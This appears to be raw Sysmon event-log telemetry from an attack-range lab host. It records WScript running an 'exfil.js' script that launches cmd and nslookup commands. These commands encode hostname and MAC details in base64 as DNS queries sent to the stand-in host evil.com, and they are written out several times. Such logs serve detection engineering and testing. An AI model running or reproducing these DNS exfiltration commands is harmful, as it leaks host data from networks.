14:16:36.492{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.492{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-FE40-000000005F02}3008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.492{2E1864BB-17A1-629A-783D-000000005F02}55525776C:\Windows\System32\WScript.exe{2E1864BB-17C4-629A-FE40-000000005F02}3008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.491{2E1864BB-17C4-629A-FE40-000000005F02}3008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RE5TSG9zdE5hbWU6IHdpbi1kYy1jdC1hdHRhY2stcmFuZ2UtMzA0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqfqm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.476{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltjzadb.tmpMD5=B16E2386D2E39F09BDE969D627970342,SHA256=797A98F63D6E57D0F6A3377DF2DF1B9F1EDDED7E98D9A5F6DC7382913541E075,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.429{2E1864BB-17C4-629A-FC40-000000005F02}45967632C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-FD40-000000005F02}5232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.429{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-FD40-000000005F02}5232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.429{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.429{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.429{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.429{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.429{2E1864BB-17C4-629A-FB40-000000005F02}78082260C:\Windows\system32\cmd.exe{2E1864BB-17C4-629A-FD40-000000005F02}5232C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.438{2E1864BB-17C4-629A-FD40-000000005F02}5232C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C4-629A-FB40-000000005F02}7808C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltjzadb.tmp 2>&1 10341000x8000000000000000201725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.407{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-FC40-000000005F02}4596C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.407{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-FC40-000000005F02}4596C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.539{00000000-0000-0000-0000-000000000000}7984<unknown process>-udptruefalse127.0.0.1-52820-false127.0.0.1-53domain 354300x8000000000000000201722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.453{00000000-0000-0000-0000-000000000000}7488<unknown process>-udptruefalse127.0.0.1-52816-false127.0.0.1-53domain 354300x8000000000000000201721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.303{00000000-0000-0000-0000-000000000000}6712<unknown process>-udpfalsefalse127.0.0.1-52812-false127.0.0.1-53domain 354300x8000000000000000201720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.302{00000000-0000-0000-0000-000000000000}6712<unknown process>-udptruefalse127.0.0.1-52810-false127.0.0.1-53domain 10341000x8000000000000000201719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.407{2E1864BB-17C4-629A-FC40-000000005F02}45967632C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-FB40-000000005F02}7808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.376{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-FC40-000000005F02}4596C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.376{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.376{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-FB40-000000005F02}7808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.376{2E1864BB-17A1-629A-783D-000000005F02}55524804C:\Windows\System32\WScript.exe{2E1864BB-17C4-629A-FB40-000000005F02}7808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.376{2E1864BB-17C4-629A-FB40-000000005F02}7808C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltjzadb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.360{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnhjvr.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.329{2E1864BB-17C4-629A-F940-000000005F02}13005064C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-FA40-000000005F02}7416C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.323{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.323{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.323{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.323{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 